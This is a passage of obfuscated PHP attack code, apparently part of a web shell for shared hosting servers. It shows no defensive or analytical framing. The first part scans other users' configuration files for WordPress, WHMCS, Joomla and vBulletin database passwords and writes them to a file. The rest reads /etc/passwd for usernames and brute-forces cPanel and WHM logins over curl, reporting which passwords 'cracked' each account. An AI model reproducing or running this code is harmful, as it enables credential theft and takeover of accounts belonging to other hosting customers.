1398. &&preg_match("/table_prefix/i",$ {
1399. $ptrckqlsicw
1400. }
1401. )) {
1402. $xoynetliybs="ffile";
1403. $ {
1404. "GLOBALS"
1405. }
1406. ["mbbohos"]="pass";
1407. $ {
1408. "GLOBALS"
1409. }
1410. ["jkoqdoylpm"]="dbp";
1411. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
1412. echo$ {
1413. $ {
1414. "GLOBALS"
1415. }
1416. ["dseeueq"]
1417. }
1418. =entre2v2($ {
1419. $ {
1420. "GLOBALS"
1421. }
1422. ["smposrbewu"]
1423. }
1424. ,"DB_PASSWORD', '","');");
1425. if(!empty($ {
1426. $ {
1427. "GLOBALS"
1428. }
1429. ["dseeueq"]
1430. }
1431. ))$ {
1432. $ {
1433. "GLOBALS"
1434. }
1435. ["mbbohos"]
1436. }
1437. =$ {
1438. $ {
1439. "GLOBALS"
1440. }
1441. ["jkoqdoylpm"]
1442. }
1443. ."
1444. ";
1445. fwrite($ {
1446. $xoynetliybs
1447. }
1448. ,$ {
1449. $ {
1450. "GLOBALS"
1451. }
1452. ["jqbdqptiz"]
1453. }
1454. );
1455. } elseif($ {
1456. $ {
1457. "GLOBALS"
1458. }
1459. ["smposrbewu"]
1460. }
1461. &&preg_match("/cc_encryption_hash/i",$ {
1462. $ {
1463. "GLOBALS"
1464. }
1465. ["smposrbewu"]
1466. }
1467. )) {
1468. $ {
1469. "GLOBALS"
1470. }
1471. ["kmisenk"]="ffile";
1472. $ {
1473. "GLOBALS"
1474. }
1475. ["vjmxfhywxr"]="uxl";
1476. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
1477. $ {
1478. "GLOBALS"
1479. }
1480. ["weynhgik"]="pass";
1481. $ukdseoc="pass";
1482. $ {
1483. "GLOBALS"
1484. }
1485. ["htwkxy"]="dbp";
1486. echo$ {
1487. $ {
1488. "GLOBALS"
1489. }
1490. ["dseeueq"]
1491. }
1492. =entre2v2($ {
1493. $ {
1494. "GLOBALS"
1495. }
1496. ["vjmxfhywxr"]
1497. }
1498. ,"db_password = '","';");
1499. if(!empty($ {
1500. $ {
1501. "GLOBALS"
1502. }
1503. ["htwkxy"]
1504. }
1505. ))$ {
1506. $ukdseoc
1507. }
1508. =$ {
1509. $ {
1510. "GLOBALS"
1511. }
1512. ["dseeueq"]
1513. }
1514. ."
1515. ";
1516. fwrite($ {
1517. $ {
1518. "GLOBALS"
1519. }
1520. ["kmisenk"]
1521. }
1522. ,$ {
1523. $ {
1524. "GLOBALS"
1525. }
1526. ["weynhgik"]
1527. }
1528. );
1529. } elseif($ {
1530. $ {
1531. "GLOBALS"
1532. }
1533. ["smposrbewu"]
1534. }
1535. &&preg_match("/dbprefix/i",$ {
1536. $dsojfl
1537. }
1538. )) {
1539. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
1540. echo$ {
1541. $ {
1542. "GLOBALS"
1543. }
1544. ["nheadbdqjtu"]
1545. }
1546. =entre2v2($ {
1547. $ {
1548. "GLOBALS"
1549. }
1550. ["smposrbewu"]
1551. }
1552. ,"password = '","';");
1553. if(!empty($ {
1554. $ {
1555. "GLOBALS"
1556. }
1557. ["nheadbdqjtu"]
1558. }
1559. ))$ {
1560. $ {
1561. "GLOBALS"
1562. }
1563. ["jqbdqptiz"]
1564. }
1565. =$ {
1566. $ {
1567. "GLOBALS"
1568. }
1569. ["nheadbdqjtu"]
1570. }
1571. ."
1572. ";
1573. fwrite($ {
1574. $ {
1575. "GLOBALS"
1576. }
1577. ["xqjsjx"]
1578. }
1579. ,$ {
1580. $ {
1581. "GLOBALS"
1582. }
1583. ["jqbdqptiz"]
1584. }
1585. );
1586. } elseif($ {
1587. $hehrkezdpk
1588. }
1589. &&preg_match("/admincpdir/i",$ {
1590. $ {
1591. "GLOBALS"
1592. }
1593. ["glpswt"]
1594. }
1595. )) {
1596. $ {
1597. "GLOBALS"
1598. }
1599. ["htwdbdmj"]="ffile";
1600. $gjyjauxxdfpq="db";
1601. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
1602. $ {
1603. "GLOBALS"
1604. }
1605. ["wripkprnh"]="uxl";
1606. echo$ {
1607. $gjyjauxxdfpq
1608. }
1609. =entre2v2($ {
1610. $ {
1611. "GLOBALS"
1612. }
1613. ["wripkprnh"]
1614. }
1615. ,"password'] = '","';");
1616. if(!empty($ {
1617. $ {
1618. "GLOBALS"
1619. }
1620. ["nheadbdqjtu"]
1621. }
1622. ))$ {
1623. $ {
1624. "GLOBALS"
1625. }
1626. ["jqbdqptiz"]
1627. }
1628. =$ {
1629. $ {
1630. "GLOBALS"
1631. }
1632. ["nheadbdqjtu"]
1633. }
1634. ."
1635. ";
1636. fwrite($ {
1637. $ {
1638. "GLOBALS"
1639. }
1640. ["htwdbdmj"]
1641. }
1642. ,$ {
1643. $ {
1644. "GLOBALS"
1645. }
1646. ["jqbdqptiz"]
1647. }
1648. );
1649. } elseif($ {
1650. $oebhbtqi
1651. }
1652. &&preg_match("/DB_DATABASE/i",$ {
1653. $ {
1654. "GLOBALS"
1655. }
1656. ["smposrbewu"]
1657. }
1658. )) {
1659. $hlhjxgxol="db";
1660. $ {
1661. "GLOBALS"
1662. }
1663. ["osbyycmsfkxm"]="db";
1664. $ {
1665. "GLOBALS"
1666. }
1667. ["rdvmodv"]="pass";
1668. $ {
1669. "GLOBALS"
1670. }
1671. ["ssvsiovd"]="db";
1672. $quoeboygi="pass";
1673. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
1674. echo$ {
1675. $ {
1676. "GLOBALS"
1677. }
1678. ["ssvsiovd"]
1679. }
1680. =entre2v2($ {
1681. $ {
1682. "GLOBALS"
1683. }
1684. ["smposrbewu"]
1685. }
1686. ,"DB_PASSWORD', '","');");
1687. if(!empty($ {
1688. $hlhjxgxol
1689. }
1690. ))$ {
1691. $quoeboygi
1692. }
1693. =$ {
1694. $ {
1695. "GLOBALS"
1696. }
1697. ["osbyycmsfkxm"]
1698. }
1699. ."
1700. ";
1701. fwrite($ {
1702. $ {
1703. "GLOBALS"
1704. }
1705. ["xqjsjx"]
1706. }
1707. ,$ {
1708. $ {
1709. "GLOBALS"
1710. }
1711. ["rdvmodv"]
1712. }
1713. );
1714. } elseif($ {
1715. $wgmhnq
1716. }
1717. &&preg_match("/dbpass/i",$ {
1718. $ {
1719. "GLOBALS"
1720. }
1721. ["jpvfshlwt"]
1722. }
1723. )) {
1724. $gbelrygh="pass";
1725. $ {
1726. "GLOBALS"
1727. }
1728. ["krskycqvw"]="db";
1729. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
1730. $dnoptjeza="db";
1731. echo$ {
1732. $ {
1733. "GLOBALS"
1734. }
1735. ["krskycqvw"]
1736. }
1737. =entre2v2($ {
1738. $ {
1739. "GLOBALS"
1740. }
1741. ["smposrbewu"]
1742. }
1743. ,"dbpass = '","';");
1744. if(!empty($ {
1745. $ {
1746. "GLOBALS"
1747. }
1748. ["nheadbdqjtu"]
1749. }
1750. ))$ {
1751. $gbelrygh
1752. }
1753. =$ {
1754. $dnoptjeza
1755. }
1756. ."
1757. ";
1758. fwrite($ {
1759. $ {
1760. "GLOBALS"
1761. }
1762. ["xqjsjx"]
1763. }
1764. ,$ {
1765. $ {
1766. "GLOBALS"
1767. }
1768. ["jqbdqptiz"]
1769. }
1770. );
1771. } elseif($ {
1772. $ {
1773. "GLOBALS"
1774. }
1775. ["smposrbewu"]
1776. }
1777. &&preg_match("/dbpass/i",$ {
1778. $ {
1779. "GLOBALS"
1780. }
1781. ["smposrbewu"]
1782. }
1783. )) {
1784. $ {
1785. "GLOBALS"
1786. }
1787. ["tsvcdhbxjjcy"]="db";
1788. $uamjgbemxfm="pass";
1789. $vhwdotel="uxl";
1790. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
1791. echo$ {
1792. $ {
1793. "GLOBALS"
1794. }
1795. ["tsvcdhbxjjcy"]
1796. }
1797. =entre2v2($ {
1798. $vhwdotel
1799. }
1800. ,"dbpass = '","';");
1801. $ {
1802. "GLOBALS"
1803. }
1804. ["jzcldxweqx"]="db";
1805. if(!empty($ {
1806. $ {
1807. "GLOBALS"
1808. }
1809. ["jzcldxweqx"]
1810. }
1811. ))$ {
1812. $uamjgbemxfm
1813. }
1814. =$ {
1815. $ {
1816. "GLOBALS"
1817. }
1818. ["nheadbdqjtu"]
1819. }
1820. ."
1821. ";
1822. fwrite($ {
1823. $ {
1824. "GLOBALS"
1825. }
1826. ["xqjsjx"]
1827. }
1828. ,$ {
1829. $ {
1830. "GLOBALS"
1831. }
1832. ["jqbdqptiz"]
1833. }
1834. );
1835. } elseif($ {
1836. $cpyvvnpbpbc
1837. }
1838. &&preg_match("/dbpass/i",$ {
1839. $mbpipeu
1840. }
1841. )) {
1842. $ynqhaxyy="uxl";
1843. echo"<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
1844. $hjtezrws="db";
1845. echo$ {
1846. $ {
1847. "GLOBALS"
1848. }
1849. ["nheadbdqjtu"]
1850. }
1851. =entre2v2($ {
1852. $ynqhaxyy
1853. }
1854. ,"dbpass = \"","\";");
1855. if(!empty($ {
1856. $ {
1857. "GLOBALS"
1858. }
1859. ["nheadbdqjtu"]
1860. }
1861. ))$ {
1862. $ {
1863. "GLOBALS"
1864. }
1865. ["jqbdqptiz"]
1866. }
1867. =$ {
1868. $hjtezrws
1869. }
1870. ."
1871. ";
1872. fwrite($ {
1873. $ {
1874. "GLOBALS"
1875. }
1876. ["xqjsjx"]
1877. }
1878. ,$ {
1879. $ {
1880. "GLOBALS"
1881. }
1882. ["jqbdqptiz"]
1883. }
1884. );
1885. }
1886. }
1887. }
1888. }
1889. echo "
1890. <form method=post>
1891. <input type=submit name=cpanel value=\"Auto username/password loading cpanel cracker\"><p>
1892. ";
1893. if(isset($_POST["cpanel"])) {
1894. echo "<form method=post><div align=center><table>
1895. want to brute=><select name=\"op\"> <option name=\"op\" value=\"cp\">CPanel</option>
1896. <option name=\"op\" value=\"whm\">WHMPanel</option></table><p>
1897. <textarea style=\"background:black;color:white\" rows=20 cols=25 name=usernames >";
1898. $porqnvoe="d";
1899. $ {
1900. $ {
1901. "GLOBALS"
1902. }
1903. ["oqvsusmuih"]
1904. }
1905. =file("/etc/passwd");
1906. foreach($ {
1907. $ {
1908. "GLOBALS"
1909. }
1910. ["oqvsusmuih"]
1911. }
1912. as$ {
1913. $ {
1914. "GLOBALS"
1915. }
1916. ["mppsifb"]
1917. }
1918. ) {
1919. $lpbvwsc="str";
1920. $ {
1921. $lpbvwsc
1922. }
1923. =explode(":",$ {
1924. $ {
1925. "GLOBALS"
1926. }
1927. ["mppsifb"]
1928. }
1929. );
1930. echo$ {
1931. $ {
1932. "GLOBALS"
1933. }
1934. ["tnsglnuwozs"]
1935. }
1936. [0]."
1937. ";
1938. }
1939. echo "</textarea><textarea style=\"background:black;color:white\" rows=20 cols=25 name=passwords >
1940. ";
1941. $ {
1942. "GLOBALS"
1943. }
1944. ["hifnaqbo"]="rt";
1945. $ {
1946. $ {
1947. "GLOBALS"
1948. }
1949. ["frnguil"]
1950. }
1951. =getcwd()."/r.txt";
1952. $ {
1953. $ {
1954. "GLOBALS"
1955. }
1956. ["mpzmgvjrk"]
1957. }
1958. =file($ {
1959. $porqnvoe
1960. }
1961. );
1962. foreach($ {
1963. $ {
1964. "GLOBALS"
1965. }
1966. ["mpzmgvjrk"]
1967. }
1968. as$ {
1969. $ {
1970. "GLOBALS"
1971. }
1972. ["hifnaqbo"]
1973. }
1974. ) {
1975. $ {
1976. "GLOBALS"
1977. }
1978. ["rxcdwquaxrv"]="str";
1979. $ {
1980. $ {
1981. "GLOBALS"
1982. }
1983. ["rxcdwquaxrv"]
1984. }
1985. =explode("\\n",$ {
1986. $ {
1987. "GLOBALS"
1988. }
1989. ["pkxusn"]
1990. }
1991. );
1992. echo trim($ {
1993. $ {
1994. "GLOBALS"
1995. }
1996. ["tnsglnuwozs"]
1997. }
1998. [0])."
1999. ";
2000. }
2001. echo "</textarea><p>
2002. <input type=submit name=cpanelcracking value=\"Kill Them\"></form>
2003. ";
2004. }
2005. $jgbrxerezme="connect_timeout";
2006. echo "
2007. ";
2008. error_reporting(0);
2009. $ {
2010. $jgbrxerezme
2011. }
2012. =5;
2013. set_time_limit(0);
2014. $ {
2015. $ {
2016. "GLOBALS"
2017. }
2018. ["fhuebeob"]
2019. }
2020. =$_POST["usernames"];
2021. $ {
2022. $ {
2023. "GLOBALS"
2024. }
2025. ["avvdiennau"]
2026. }
2027. =$_POST["passwords"];
2028. $ {
2029. $ {
2030. "GLOBALS"
2031. }
2032. ["jtxbycj"]
2033. }
2034. =$_POST["op"];
2035. $ {
2036. $ {
2037. "GLOBALS"
2038. }
2039. ["ytidfmauvywq"]
2040. }
2041. ="localhost";
2042. if(isset($_POST["cpanelcracking"])) {
2043. $ {
2044. "GLOBALS"
2045. }
2046. ["ryljoecvcpn"]="passl";
2047. $qggkxhpojj="userl";
2048. if($ {
2049. $qggkxhpojj
2050. }
2051. !==""&&$ {
2052. $ {
2053. "GLOBALS"
2054. }
2055. ["ryljoecvcpn"]
2056. }
2057. !=="") {
2058. $ {
2059. "GLOBALS"
2060. }
2061. ["tjgmxqwijql"]="userl";
2062. if($_POST["op"]=="cp") {
2063. $eftvchhiwf="cracked";
2064. $ {
2065. $ {
2066. "GLOBALS"
2067. }
2068. ["cmlkxbh"]
2069. }
2070. =$_POST["crack"];
2071. @fopen($ {
2072. $eftvchhiwf
2073. }
2074. ,"a");
2075. echo"now we are attacking cpanels....please wait till the end of process
2076. ";
2077. } elseif($_POST["op"]=="whm") {
2078. @fopen($ {
2079. $ {
2080. "GLOBALS"
2081. }
2082. ["cmlkxbh"]
2083. }
2084. ,"a");
2085. echo"now we are attacking WHM panel....please wait till the end of process";
2086. }
2087. function cpanel($host,$user,$pass,$timeout) {
2088. $ {
2089. "GLOBALS"
2090. }
2091. ["ltiohgnp"]="ch";
2092. $ {
2093. "GLOBALS"
2094. }
2095. ["ymjcnlxywym"]="data";
2096. $ {
2097. $ {
2098. "GLOBALS"
2099. }
2100. ["clcexgoc"]
2101. }
2102. =curl_init();
2103. curl_setopt($ {
2104. $ {
2105. "GLOBALS"
2106. }
2107. ["clcexgoc"]
2108. }
2109. ,CURLOPT_URL,"http://$host:2082");
2110. $ {
2111. "GLOBALS"
2112. }
2113. ["rvlqflyggs"]="ch";
2114. $yoqgvcb="ch";
2115. curl_setopt($ {
2116. $ {
2117. "GLOBALS"
2118. }
2119. ["rvlqflyggs"]
2120. }
2121. ,CURLOPT_RETURNTRANSFER,1);
2122. curl_setopt($ {
2123. $ {
2124. "GLOBALS"
2125. }
2126. ["ltiohgnp"]
2127. }
2128. ,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
2129. curl_setopt($ {
2130. $ {
2131. "GLOBALS"
2132. }
2133. ["clcexgoc"]
2134. }
2135. ,CURLOPT_USERPWD,"$user:$pass");
2136. curl_setopt($ {
2137. $ {
2138. "GLOBALS"
2139. }
2140. ["clcexgoc"]
2141. }
2142. ,CURLOPT_CONNECTTIMEOUT,$ {
2143. $ {
2144. "GLOBALS"
2145. }
2146. ["ainkhzdg"]
2147. }
2148. );
2149. $rcmngcbqlp="ch";
2150. curl_setopt($ {
2151. $ {
2152. "GLOBALS"
2153. }
2154. ["clcexgoc"]
2155. }
2156. ,CURLOPT_FAILONERROR,1);
2157. $ {
2158. $ {
2159. "GLOBALS"
2160. }
2161. ["ymjcnlxywym"]
2162. }
2163. =curl_exec($ {
2164. $rcmngcbqlp
2165. }
2166. );
2167. if(curl_errno($ {
2168. $yoqgvcb
2169. }
2170. )==0) {
2171. echo"<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
2172. }
2173. curl_close($ {
2174. $ {
2175. "GLOBALS"
2176. }
2177. ["clcexgoc"]
2178. }
2179. );
2180. }
2181. $ {
2182. $ {
2183. "GLOBALS"
2184. }
2185. ["cywofo"]
2186. }
2187. =explode("
2188. ",$ {
2189. $ {
2190. "GLOBALS"
2191. }
2192. ["afrrfxkgbv"]
2193. }
2194. );
2195. $ {
2196. $ {
2197. "GLOBALS"
2198. }
2199. ["iasgvgve"]
2200. }
2201. =explode("
2202. ",$ {
2203. $ {
2204. "GLOBALS"
2205. }
2206. ["avvdiennau"]
2207. }
2208. );
2209. if($ {
2210. $ {
2211. "GLOBALS"
2212. }
2213. ["jtxbycj"]
2214. }
2215. =="cp") {
2216. $rqqyjvw="userlist";
2217. foreach($ {
2218. $rqqyjvw
2219. }
2220. as$ {
2221. $ {
2222. "GLOBALS"
2223. }
2224. ["mppsifb"]
2225. }
2226. ) {
2227. $ {
2228. "GLOBALS"
2229. }
2230. ["jkbgmwekkxo"]="user";
2231. $ {
2232. "GLOBALS"
2233. }
2234. ["nfrmapgqp"]="password";
2235. echo"<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
2236. $ {
2237. $ {
2238. "GLOBALS"
2239. }
2240. ["wqykbxlcrzw"]
2241. }
2242. =trim($ {
2243. $ {
2244. "GLOBALS"
2245. }
2246. ["jkbgmwekkxo"]
2247. }
2248. );
2249. foreach($ {
2250. $ {
2251. "GLOBALS"
2252. }
2253. ["iasgvgve"]
2254. }
2255. as$ {
2256. $ {
2257. "GLOBALS"
2258. }
2259. ["nfrmapgqp"]
2260. }
2261. ) {
2262. $ {
2263. "GLOBALS"
2264. }
2265. ["vfloulq"]="finaluser";
2266. $ {
2267. "GLOBALS"
2268. }
2269. ["gugnulvu"]="password";
2270. $ {
2271. "GLOBALS"
2272. }
2273. ["zthmsnxjxpd"]="finalpass";
2274. $ {
2275. $ {
2276. "GLOBALS"
2277. }
2278. ["zthmsnxjxpd"]
2279. }
2280. =trim($ {
2281. $ {
2282. "GLOBALS"
2283. }
2284. ["gugnulvu"]
2285. }
2286. );
2287. cpanel($ {
2288. $ {
2289. "GLOBALS"
2290. }
2291. ["qkfpdhf"]
2292. }
2293. ,$ {
2294. $ {
2295. "GLOBALS"
2296. }
2297. ["vfloulq"]
2298. }
2299. ,$ {
2300. $ {
2301. "GLOBALS"
2302. }
2303. ["onsdfdthx"]
2304. }
2305. ,$ {
2306. $ {
2307. "GLOBALS"
2308. }
2309. ["trhahkqrevw"]
2310. }
2311. );
2312. }
2313. }
2314. }
2315. $vlxjwdbxb="attack";
2316. function whm($host,$user,$pass,$timeout) {
2317. $dxtkzggvz="ch";
2318. $ {
2319. $ {
2320. "GLOBALS"
2321. }
2322. ["clcexgoc"]
2323. }
2324. =curl_init();
2325. curl_setopt($ {
2326. $ {
2327. "GLOBALS"
2328. }
2329. ["clcexgoc"]
2330. }
2331. ,CURLOPT_URL,"http://$host:2086");
2332. $ {
2333. "GLOBALS"
2334. }
2335. ["punmlep"]="ch";
2336. curl_setopt($ {
2337. $ {
2338. "GLOBALS"
2339. }
2340. ["clcexgoc"]
2341. }
2342. ,CURLOPT_RETURNTRANSFER,1);
2343. $brltfbtspgf="ch";
2344. $ {
2345. "GLOBALS"
2346. }
2347. ["rbyfstgofou"]="ch";
2348. curl_setopt($ {
2349. $dxtkzggvz
2350. }
2351. ,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
2352. curl_setopt($ {
2353. $ {
2354. "GLOBALS"
2355. }
2356. ["clcexgoc"]
2357. }
2358. ,CURLOPT_USERPWD,"$user:$pass");
2359. curl_setopt($ {
2360. $ {
2361. "GLOBALS"
2362. }
2363. ["clcexgoc"]
2364. }
2365. ,CURLOPT_CONNECTTIMEOUT,$ {
2366. $ {
2367. "GLOBALS"
2368. }
2369. ["ainkhzdg"]
2370. }
2371. );
2372. curl_setopt($ {
2373. $ {
2374. "GLOBALS"
2375. }
2376. ["clcexgoc"]
2377. }
2378. ,CURLOPT_FAILONERROR,1);
2379. $ {
2380. $ {
2381. "GLOBALS"
2382. }
2383. ["tmwmkkbdjy"]
2384. }
2385. =curl_exec($ {
2386. $ {
2387. "GLOBALS"
2388. }
2389. ["punmlep"]
2390. }
2391. );
2392. if(curl_errno($ {
2393. $brltfbtspgf
2394. }
2395. )==0) {
2396. echo"<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
2397. }
2398. curl_close($ {
2399. $ {
2400. "GLOBALS"
2401. }
2402. ["rbyfstgofou"]
2403. }
2404. );
2405. }
2406. $pjjgkbchjh="userlist";
2407. $ {
2408. "GLOBALS"
2409. }
2410. ["iuvrfxys"]="passl";
2411. $ {
2412. $pjjgkbchjh
2413. }
2414. =explode("
2415. ",$ {
2416. $ {
2417. "GLOBALS"
2418. }
2419. ["tjgmxqwijql"]
2420. }
2421. );
2422. $ {
2423. $ {
2424. "GLOBALS"
2425. }
2426. ["iasgvgve"]
2427. }
2428. =explode("
2429. ",$ {
2430. $ {
2431. "GLOBALS"
2432. }
2433. ["iuvrfxys"]
2434. }
2435. );
2436. if($ {
2437. $vlxjwdbxb
2438. }
2439. =="whm") {
2440. $vilwukxpjzn="userlist";
2441. foreach($ {
2442. $vilwukxpjzn
2443. }
2444. as$ {
2445. $ {
2446. "GLOBALS"
2447. }
2448. ["mppsifb"]
2449. }
2450. ) {
2451. echo"<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
2452. $ {
2453. "GLOBALS"
2454. }
2455. ["uxvypjylg"]="password";
2456. $ {
2457. $ {
2458. "GLOBALS"
2459. }
2460. ["wqykbxlcrzw"]
2461. }
2462. =trim($ {
2463. $ {
2464. "GLOBALS"
2465. }
2466. ["mppsifb"]
2467. }
2468. );
2469. foreach($ {
2470. $ {
2471. "GLOBALS"
2472. }
2473. ["iasgvgve"]
2474. }
2475. as$ {
2476. $ {
2477. "GLOBALS"
2478. }
2479. ["uxvypjylg"]
2480. }
2481. ) {
2482. $ {
2483. "GLOBALS"
2484. }
2485. ["pdqibcl"]="finalpass";
2486. $iorfkywtph="finalpass";
2487. $ {
2488. $ {
2489. "GLOBALS"
2490. }
2491. ["pdqibcl"]
2492. }
2493. =trim($ {
2494. $ {
2495. "GLOBALS"
2496. }
2497. ["urgtxxu"]
2498. }
2499. );
2500. whm($ {
2501. $ {
2502. "GLOBALS"
2503. }
2504. ["qkfpdhf"]
2505. }
2506. ,$ {
2507. $ {
2508. "GLOBALS"
2509. }
2510. ["wqykbxlcrzw"]
2511. }
2512. ,$ {
2513. $iorfkywtph
2514. }
2515. ,$ {
2516. $ {
2517. "GLOBALS"
2518. }
2519. ["trhahkqrevw"]
2520. }
2521. );
2522. }
2523. }
2524. }
2525. } elseif($ {
2526. $ {
2527. "GLOBALS"
2528. }
2529. ["afrrfxkgbv"]
2530. }
2531. =="") {
2532. echo"what are you doing :( , you have left userlist field empty";
2533. } elseif($ {
2534. $ {
2535. "GLOBALS"
2536. }
2537. ["avvdiennau"]
2538. }
2539. =="") {
2540. echo"please put passwords in paasword list field";
2541. }
2542. }
2543. ?>